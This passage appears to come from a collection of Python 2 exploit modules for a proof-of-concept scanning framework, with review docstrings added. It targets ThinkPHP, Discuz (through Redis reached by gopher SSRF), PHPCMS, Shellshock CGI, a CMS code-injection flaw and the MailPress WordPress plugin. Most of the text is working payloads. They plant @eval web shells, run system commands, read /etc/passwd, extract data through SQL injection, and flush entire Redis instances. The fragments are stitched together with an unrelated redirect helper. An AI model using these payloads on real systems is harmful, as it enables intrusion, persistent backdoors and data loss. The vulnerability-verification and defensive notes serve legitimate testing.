                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]

        for p in payloads2:
            url=vul_ip+p
            try:
                text = req.get(url,timeout=4).text
                # listing markers (ls/dir output) or the phpinfo page header
                if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = p
                    return self.save_output(result)
            except Exception as e:
                print e
                pass

        return self.save_output(result)
    def _attack(self):
        """Plant a web shell via an SSRF that reaches the local Redis and rewrites forum settings.

        ``self.url`` is treated as the SSRF endpoint: the ``gopher://127.0.0.1:6379`` payload
        makes Redis EVAL a script that overwrites every ``*_setting`` key with a serialised
        settings blob carrying an injected ``system(base64_decode($_GET[c]))``. The method
        then walks up the URL one path component at a time looking for a ``forum.php`` that
        answers 200, uses the injected command to write ``<random>.php`` with a one-line
        ``@eval``, confirms it with a random marker, and finally sends ``flushall`` to
        Redis and reloads ``forum.php``.

        Returns:
            ``self.parse_output(result)``; ``ShellInfo`` (URL and content) is set only when
            the planted file answers with the marker.

        Notes:
            * ``flushall`` wipes every key in every Redis database, not just the
              ``*_setting`` keys the payload changed -- collateral damage on a shared
              instance, and it runs whether or not the shell was confirmed.
            * The planted ``<random>.php`` is never removed.
            * The loop stops when the last path component equals the netloc (the site
              root); if ``self.url`` has no path, the body never runs.
            * The response of the EVAL request is not checked.
            * Python 2 (``string.lowercase``, ``base64.b64encode`` on a str, str
              ``.content``).
            * Preconditions a defender can remove: an SSRF sink that honours ``gopher://``
              and a Redis on 127.0.0.1:6379 reachable without AUTH from the web tier.
        """
        result = {}
        payload = ('gopher://127.0.0.1:6379/'
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
                   'a:1:{s:7:\\\"plugins\\\";s:32:\\\"system(base64_decode($_GET[c]));\\\";}}}'
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
                   ' end;return 1;" 0 %250D%250Aquit')
        vul_url = self.url + payload
        req.get(vul_url)

        # (head, sep, tail) of the URL; the loop strips one path component per iteration
        web_url = self.url.rpartition('/')
        while web_url[2] != urlparse.urlparse(self.url).netloc:
            shell_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(shell_url)

            if rep.status_code == 200:

                # Using this file directly as a one-liner shell gets the payload blocked,
                # and the shell is lost after the flush, so the command shell is used to
                # write a one-liner into the current directory instead.
                flag = ''.join([random.choice(string.digits) for _ in range(8)])
                shell_flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
                shell_payload = 'echo \'<?php @eval($_POST[c]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
                shell_payload_b64 = base64.b64encode(shell_payload)
                req.get(shell_url + '&c=' + shell_payload_b64)

                shell_url = web_url[0] + '/' + shell_flag + '.php'
                rep = req.get(shell_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_POST[c]);'

                # restore after verification so the site stays reachable
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')

                break

            web_url = web_url[0].rpartition('/')

        return self.parse_output(result)
    def _attack(self):
        """Variant of the Redis-via-SSRF shell plant that only tries the parent path of ``self.url``.

        Same mechanism as the sibling ``_attack``: an SSRF'd ``gopher://127.0.0.1:6379``
        EVAL rewrites every ``*_setting`` key so that ``forum.php`` runs
        ``system(base64_decode($_GET[dshtanger]))``; that is used to write
        ``<random>.php`` with an ``@eval`` one-liner, which is then fetched and checked for
        a random marker; on success Redis is ``flushall``-ed and ``forum.php`` reloaded.

        Returns:
            ``self.parse_output(result)``; ``ShellInfo`` is set only on a confirmed shell.

        Notes:
            * Loop-termination defect: ``vul_rep`` never changes inside the ``while``, and
              the only ``break`` is on the success path. If ``forum.php`` is not 200, or the
              marker is not found, the loop repeats forever -- and on every pass it writes
              another random ``.php`` file to the target.
            * The leading ``x`` in ``gopher://.../xeval`` (``_`` in the sibling blocks) is
              presumably the gopher item-type byte that the client strips -- TODO confirm.
            * ``flushall`` wipes the whole Redis instance; the planted file is never removed.
            * Python 2 (``string.letters``, ``base64.b64encode`` on a str, str ``.content``).
        """
        result = {}
        # (head, sep, tail); only url_part[0], the parent of self.url, is used below
        url_part = self.url.rpartition('/')

        payload = ('gopher://127.0.0.1:6379/xeval '
                '"local t=redis.call(\'keys\',\'*_setting\');'
                'for i,v in ipairs(t) do redis.call(\'set\',v,'
                '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
                'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
                's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
                's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
                's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
                'return 1;" 0 %250D%250Aquit')

        target_url = self.url + payload
        vul_rep = req.get(target_url)

        # NOTE(review): condition is loop-invariant; see docstring on non-termination
        while vul_rep.status_code == 200:
            shell_url = url_part[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            shell_rep = req.get(shell_url)

            if shell_rep.status_code == 200:
                random_sed = string.letters+string.digits
                flag = ''.join([random.choice(random_sed) for _ in range(8)])
                shell_flag = ''.join([random.choice(random_sed) for _ in range(8)])

                # use system() to write a shell php file; that file survives the Redis flush
                shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
                shell_payload_b64 = base64.b64encode(shell_payload)
                # write a random php file
                req.get(shell_url + '&dshtanger=' + shell_payload_b64)
                # access this php file
                verify_url = url_part[0] + '/' + shell_flag + '.php'
                verify_rep = req.get(verify_url)

                if (verify_rep.status_code == 200) and ( flag in verify_rep.content):
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = verify_url
                    result['ShellInfo']['Content'] = '@eval($_POST[dshtanger]);'

                    # recover website
                    flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
                    flush_url = self.url + flush_payload
                    req.get(flush_url)

                    test_url = url_part[0] + '/forum.php'
                    req.get(test_url)

                    break
        return self.parse_output(result)
Example #34
    def _verify(self):
        """Error-based SQL injection check on the ``comment_list`` wap action.

        The ``commentid`` parameter is extended with a double-URL-encoded ``updatexml``
        expression that wraps ``version()`` in ``~~~``; the check passes when the response
        body contains a ``~~~...~~~`` span, i.e. the database error text was echoed back.

        Returns:
            ``self.parse_output(result)`` with ``VerifyInfo`` (URL and payload) on a hit.

        Notes:
            * ``re`` and ``req`` are module-level names; Python 2 str ``.content``.
            * Only the presence of the marker is checked; the captured value (the DB
              version) is not stored in ``result``.
            * The double encoding (``%2527`` for ``'``) suggests the parameter is decoded
              twice before reaching the query -- presumably. Mitigation is a parameterised
              query for ``commentid``; suppressing error output removes the oracle only.
        """
        result = {}
        vulurl = "%s/index.php?m=wap&c=index&a=comment_list&commentid=content_12" % self.url
        payload = "%2527%20or%20updatexml(1,concat(0x7e7e7e,version(),0x7e7e7e)),0)%23-84-1"
        resp = req.get(vulurl+payload)
        # 0x7e7e7e is "~~~"; anything between two such runs is the leaked expression value
        re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
        if re_result:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_output(result)
Example #35
    def _verify(self):
        """Check for Bash environment-variable injection (Shellshock) through a CGI module.

        The ``User-Agent`` header carries a ``() { :; };``-prefixed value that runs
        ``cat /etc/passwd``; a hit requires ``root:x:0:0:root:`` in the response body.

        Returns:
            ``self.parse_output(result)``; ``VerifyInfo`` is set on a hit.

        Notes:
            * The probe reads back ``/etc/passwd``, which is more than a yes/no check needs;
              a proof that only echoes a random marker would carry the same signal without
              retrieving a system file.
            * ``VerifyInfo['PostData']`` is misnamed: the injection travels in a request
              header and the request is a GET.
            * Detection: the ``() {`` prefix in any inbound header value is the classic
              signature; the fix is a patched bash (or not running CGI through it).
        """
        result = {}
        header = {
            'User-Agent': '() { :; }; echo; /bin/cat /etc/passwd'
        }
        res = req.get("%s/tarantella/cgi-bin/modules.cgi" % self.url, headers = header)
        if 'root:x:0:0:root:' in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Url'] = self.url
            result['VerifyInfo']['PostData'] = '() { :; }; echo; /bin/cat /etc/passwd'

        return self.parse_output(result)
    def _attack(self):
        """Redis-via-SSRF shell plant through a local ``ssrf.php`` helper, writing a fixed ``shell.php``.

        ``ssrf_url`` names the SSRF sink appended to ``self.url``; the gopher payload
        rewrites every ``*_setting`` key so that ``forum.php`` runs
        ``eval(base64_decode($_REQUEST[a]))``. That is used to ``file_put_contents`` a
        ``shell.php`` with an ``@eval`` one-liner, which is then fetched with
        ``?she1l=phpinfo();`` and checked for ``phpinfo``; on success Redis is flushed and
        ``forum.php`` reloaded.

        Returns:
            ``self.parse_output(result)``; ``ShellInfo`` is set only on a confirmed shell.

        Notes:
            * ``self.url`` is mutated (rebuilt with a trailing ``/``) -- a side effect on the
              instance -- and ``self.url + '/forum.php...'`` then yields a ``//``.
            * The ``while`` condition is loop-invariant and there is no ``break`` when
              ``forum.php`` is not 200, so that case loops forever re-requesting it.
            * The last two statements of the loop body and the second ``return`` are
              unreachable (``break`` precedes the ``rpartition``; the first ``return``
              precedes the second).
            * The shell name ``shell.php`` is fixed and never removed, and ``flushall``
              wipes the whole Redis instance.
            * Python 2 (``base64.b64encode`` on a str, str ``.content``).
        """
        result = {}
        ssrf_url = "ssrf.php?ssrf=" # the SSRF helper file (dz presumably = Discuz, see sibling methods)

        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')

        # rebuild self.url with a trailing slash (mutates the instance)
        web_url = self.url.rpartition('/')
        self.url = web_url[0]+ '/' + web_url[2] + '/'
        vul_url = self.url + ssrf_url + payload
        base_rep = req.get(vul_url)
        # recomputed on the modified self.url: web_url[0] is now self.url without the slash
        web_url = self.url.rpartition('/')
        # NOTE(review): condition never changes; see docstring on non-termination
        while base_rep.status_code == 200:
            shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(shell_url)
            if rep.status_code == 200:
                shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[she1l]);?>");'
                shell_payload_b64 = base64.b64encode(shell_payload)
                attack_url= shell_url + '&a=' + shell_payload_b64
                req.get(attack_url)
                flag = "phpinfo";
                shell_url = web_url[0] + '/' + 'shell.php'
                verify_url = shell_url + "?she1l=phpinfo();"
                rep = req.get(verify_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_REQUEST[she1l]);'

                    # clean up the backend store (flushes the whole Redis instance)
                    payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                    recover_url = self.url + ssrf_url +payload_flush
                    req.get(recover_url)
                    req.get(web_url[0] + '/forum.php')
                break
                # NOTE(review): unreachable -- preceded by break
                web_url = web_url[0].rpartition('/')
        return self.parse_output(result)
        # NOTE(review): unreachable -- duplicate return
        return self.parse_output(result)
Example #37
def resolve_js_redirects(url):
    """Fetch ``url`` and return the destination of a client-side redirect, if any.

    The URL gets an ``http://`` prefix when it has no scheme. After the request, the
    body is scanned for three redirect idioms in order -- a ``<meta ... url=`` refresh,
    a ``<body ... location=`` handler, and a ``window.location.replace/href/assign``
    script -- and the first captured target is returned verbatim (it may be relative).
    Otherwise the final URL reported by the HTTP client (after server-side redirects)
    is returned.

    Args:
        url: target, with or without scheme.

    Returns:
        The redirect target string found in the body, else ``res.url``.

    Notes:
        The regexes capture up to the first character outside ``[\\d\\w://\\\\.?=&;%-]``,
        so targets containing e.g. ``#`` or ``+`` are truncated; ``req`` is the
        module-level HTTP client.
    """
    meta_regx = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
    body_regx = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
    js_regx = '''(?is)<script.*?>[^<>]*?window\.location\.(?:replace|href|assign)[\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''

    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    res = req.get(url)
    fallback = res.url

    for pattern in (meta_regx, body_regx, js_regx):
        hit = re.search(pattern, res.text)
        if hit is not None:
            return hit.group(1)
    return fallback
    def _verify(self):
        """Code-injection check through the ``content_class`` parameter of the ``find`` action.

        A random 10-character flag is embedded in a ``content_class`` value that closes the
        class reference and injects ``echo md5(<flag>)``; the check passes when the
        response contains the MD5 hex digest of that flag.

        Returns:
            ``self.parse_output(result)``; ``VerifyInfo['URL']`` is set on a hit.

        Notes:
            * Loop-termination defect: ``target_rep`` never changes inside the ``while`` and
              the only ``break`` is on a hit, so a 200 response that lacks the digest spins
              forever (no further requests, just a busy loop).
            * ``url_part`` is computed but unused.
            * Python 2 (``string.letters``, ``xrange``, ``hashlib.md5`` on a str, str
              ``.content``).
        """
        result = {}
        url_part = self.url.rpartition('/')
        random_sed = string.letters+string.digits
        flag = ''.join([random.choice(random_sed) for _ in xrange(10)])
        payload = "/index.php?app=core&module=system&controller=content&do=find&content_class=cms\\Fields1{}echo%20" + "md5(" + flag + ");/*"

        target_url = self.url + payload
        target_rep = req.get(target_url)

        # NOTE(review): condition is loop-invariant; see docstring on non-termination
        while target_rep.status_code == 200:

            flag_hash = hashlib.md5(flag).hexdigest()
            if flag_hash in target_rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                break

        return self.parse_output(result)
    def _verify(self):
        """Verify the Redis-via-SSRF settings rewrite using a local ``ssrf_gopher.php`` helper.

        As the header comment says, ``ssrf_url`` is a test file the author placed in the
        Discuz install; the gopher payload makes Redis overwrite every ``*_setting`` key
        with a settings blob that injects ``phpinfo();``, and the check passes when the
        ``forum.php`` AJAX endpoint then contains ``phpinfo``. On a hit Redis is
        ``flushall``-ed and ``forum.php`` reloaded.

        Returns:
            ``self.parse_output(result)``; ``VerifyInfo['URL']`` is set on a hit.

        Notes:
            * ``self.url`` is truncated to ``scheme://netloc/<first path segment>`` -- a
              side effect on the instance -- and printed to stdout first.
            * Loop-termination defect: ``base_rep`` never changes and there is no
              ``break`` when ``phpinfo`` is absent, so that case re-requests
              ``verify_url`` forever.
            * ``flushall`` wipes the whole Redis instance, not only the rewritten keys.
            * Python 2 (``print`` statement, ``urlparse`` module, str ``.content``).
        """
        ###
        #!!!!The ssrf_url is one file i put it in discuz for test.
        #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
        ###
        print self.url
        ssrf_url = "ssrf_gopher.php?ssrf="
        result = {}
        #Write your code here

        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')

        # keep only the first path segment of self.url (mutates the instance)
        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
            #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        vul_url = self.url + '/' + ssrf_url + payload


        base_rep = req.get(vul_url)

        # NOTE(review): condition is loop-invariant; see docstring on non-termination
        while base_rep.status_code == 200:
            verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(verify_url)
            flag = 'phpinfo';

            if flag in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
                # restore: flush the whole Redis instance, then reload forum.php
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + '/' +ssrf_url + payload_flush

                req.get(recover_url)
                req.get(self.url + '/forum.php')

                break

        return self.parse_output(result)
    def _attack(self):
        """Plant PHP through the MailPress ``autosave`` action and read it back via ``iview``.

        The POST stores a mail draft whose ``subject`` holds ``echo md5(<flag>)`` plus an
        ``@eval`` one-liner; the draft id is scraped from the ``<autosave id='N'`` reply
        and the ``iview`` action for that id is fetched. A hit requires the MD5 digest of
        the flag in that response.

        Returns:
            ``self.parse_output(result)``; ``ShellInfo`` is set on a hit.

        Notes:
            * ``getid[0]`` raises IndexError when the reply has no ``<autosave id=``
              element (e.g. the plugin is absent or returns an error page) -- there is no
              guard.
            * The ``while`` body ends in an unconditional ``break``, so it behaves as an
              ``if int(tmpid) > 0``.
            * ``ShellInfo['Content']`` records ``$_REQUEST[c1tas]`` while the planted
              subject uses ``$_REQUEST[shell]``; the recorded string does not match what
              was written.
            * ``self.url`` is truncated to ``scheme://netloc/<first path segment>`` -- a
              side effect on the instance; the stored draft is never deleted.
            * Python 2 (``hashlib.md5`` on a str, str ``.content``, ``urlparse`` module).
        """
        result = {}
        flag = ''.join([random.choice(string.digits) for _ in range(8)])
        flag_hash = hashlib.md5(flag).hexdigest()
        exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
        post_data = {
            'action':'autosave',
            'id':'0',
            'revision':'-1',
            'to_list':'1',
            'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>',
            'mail_format':'standard',
            'autosave':'1'
        }

        # keep only the first path segment of self.url (mutates the instance)
        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc

        vul_url = self.url + '/' + exp_url
        base_rep = req.post(vul_url,data=post_data)
        # NOTE(review): no guard -- getid[0] raises IndexError when nothing matched
        getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I)
        tmpid = getid[0].split("'")[1]

        # effectively an "if": the body always breaks
        while int(tmpid) > 0:
            shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid
            rep = req.get(shell_url)

            if flag_hash in rep.content:

                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'

            break


        return self.parse_output(result)
    def _verify(self):
        """Verify the Redis-via-SSRF settings rewrite with an ``md5(<flag>)`` marker.

        ``self.url`` is treated as the SSRF endpoint; the gopher payload makes Redis
        overwrite every ``*_setting`` key with a settings blob that injects
        ``md5(<random flag>);``. The method then walks up the URL one path component at a
        time and fetches the ``forum.php`` AJAX endpoint; a hit requires the flag's MD5
        digest in the body. On a hit Redis is ``flushall``-ed and ``forum.php`` reloaded.

        Returns:
            ``self.parse_output(result)``; ``VerifyInfo['URL']`` is set on a hit.

        Notes:
            * The payload's ``s:14:`` length prefix assumes ``md5(`` + 8 digits + ``);`` --
              14 characters -- which matches the 8-digit flag generated here.
            * The loop stops when the last path component equals the netloc; if
              ``self.url`` has no path, the body never runs.
            * ``flushall`` wipes the whole Redis instance, not only the rewritten keys.
            * The response of the EVAL request is not checked.
            * Python 2 (``hashlib.md5`` on a str, str ``.content``, ``urlparse`` module).
        """
        result = {}
        #Write your code here
        flag = ''.join([random.choice(string.digits) for _ in range(8)])
        payload = ('gopher://127.0.0.1:6379/'
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
                   'a:1:{s:7:\\\"plugins\\\";s:14:\\\"md5(' + flag + ');\\\";}}}'
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
                   ' end;return 1;" 0 %250D%250Aquit')
        vul_url = self.url + payload
        req.get(vul_url)

        # (head, sep, tail) of the URL; the loop strips one path component per iteration
        web_url = self.url.rpartition('/')
        while web_url[2] != urlparse.urlparse(self.url).netloc:
            poc_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(poc_url)
            flag_hash = hashlib.md5(flag).hexdigest()

            if flag_hash in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_url

                # restore after verification so the site stays reachable
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')

                break

            web_url = web_url[0].rpartition('/')

        return self.parse_output(result)
    def _verify(self):
        '''
            Set up ssrf.php locally and use it to verify the PoC.

            ``ssrf_url`` is the SSRF sink appended to ``self.url``; the gopher payload
            makes Redis overwrite every ``*_setting`` key with a settings blob that
            injects ``phpinfo();``, and the check passes when the ``forum.php`` AJAX
            endpoint then contains ``phpinfo``. On a hit Redis is ``flushall``-ed and
            ``forum.php`` reloaded.

            Returns ``self.parse_output(result)``; ``VerifyInfo['URL']`` is set on a hit.

            Notes:
              * ``self.url`` is rebuilt with a trailing ``/`` (a side effect on the
                instance), so ``self.url + '/forum.php...'`` contains a ``//``.
              * Loop-termination defect: ``base_rep`` never changes, ``verify_url`` is
                built from ``self.url`` rather than ``web_url`` (so the ``rpartition`` at
                the end of the body changes nothing that is requested), and there is no
                ``break`` when ``phpinfo`` is absent -- that case re-requests the same
                URL forever.
              * ``flushall`` wipes the whole Redis instance, not only the rewritten keys.
              * Python 2 (str ``.content``).
        '''
        ssrf_url = "ssrf.php?ssrf=" #
        result = {}

        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')

        # rebuild self.url with a trailing slash (mutates the instance)
        web_url = self.url.rpartition('/')
        self.url = web_url[0]+ '/' + web_url[2] + '/'
        vul_url = self.url + ssrf_url + payload
        base_rep = req.get(vul_url)

        # NOTE(review): condition is loop-invariant; see docstring on non-termination
        while base_rep.status_code == 200:
            verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(verify_url)
            flag = 'phpinfo';

            if flag in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
                # restore: flush the whole Redis instance, then reload forum.php
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + ssrf_url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')

                break

            # NOTE(review): web_url is not used by verify_url, so this does not advance the loop
            web_url = web_url[0].rpartition('/')

        return self.parse_output(result)
    def _verify(self):
        """Verify the Redis-via-SSRF settings rewrite against the parent path of ``self.url``.

        The ``gopher://127.0.0.1:6379/xeval`` payload is appended to ``self.url`` and makes
        Redis overwrite every ``*_setting`` key with a settings blob that injects
        ``md5(<random 16-char flag>);``; the ``forum.php`` AJAX endpoint under the parent
        path is then fetched and a hit requires the flag's MD5 digest in the body. On a hit
        Redis is ``flushall``-ed and ``forum.php`` reloaded.

        Returns:
            ``self.parse_output(result)``; ``VerifyInfo['URL']`` is set on a hit.

        Notes:
            * Loop-termination defect: ``target_rep`` never changes and there is no
              ``break`` when the digest is absent, so that case re-requests ``poc_url``
              forever.
            * The payload's ``s:22:`` length prefix assumes ``md5(`` + 16 chars + ``);`` --
              22 characters -- which matches the flag length generated here.
            * The leading ``x`` after the gopher path is presumably the item-type byte the
              client strips (the sibling methods use ``_``) -- TODO confirm.
            * ``flushall`` wipes the whole Redis instance, not only the rewritten keys.
            * Python 2 (``string.letters``, ``xrange``, ``hashlib.md5`` on a str, str
              ``.content``).
        """
        result = {}
        # (head, sep, tail); only url_part[0], the parent of self.url, is used below
        url_part = self.url.rpartition('/')
        #ssrf_url = "ssrf_gopher.php?ssrf="
        random_sed = string.letters+string.digits
        flag = ''.join([random.choice(random_sed) for _ in xrange(16)])
        payload = ('gopher://127.0.0.1:6379/xeval '
                '"local t=redis.call(\'keys\',\'*_setting\');'
                'for i,v in ipairs(t) do redis.call(\'set\',v,'
                '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
                'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
                's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
                's:22:\\"md5('+ flag +');\\";}}}'
                's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
                'return 1;" 0 %250D%250Aquit')

        target_url = self.url + payload
        target_rep = req.get(target_url)

        # NOTE(review): condition is loop-invariant; see docstring on non-termination
        while target_rep.status_code == 200 :
            poc_url = url_part[0] +'/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            poc_rep = req.get(poc_url)
            flag_hash = hashlib.md5(flag).hexdigest()

            if flag_hash in poc_rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_url

                # recover website (flushes the whole Redis instance)
                flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
                flush_url = self.url + flush_payload
                req.get(flush_url)

                test_url = url_part[0] + '/forum.php'
                req.get(test_url)

                break
        return self.parse_output(result)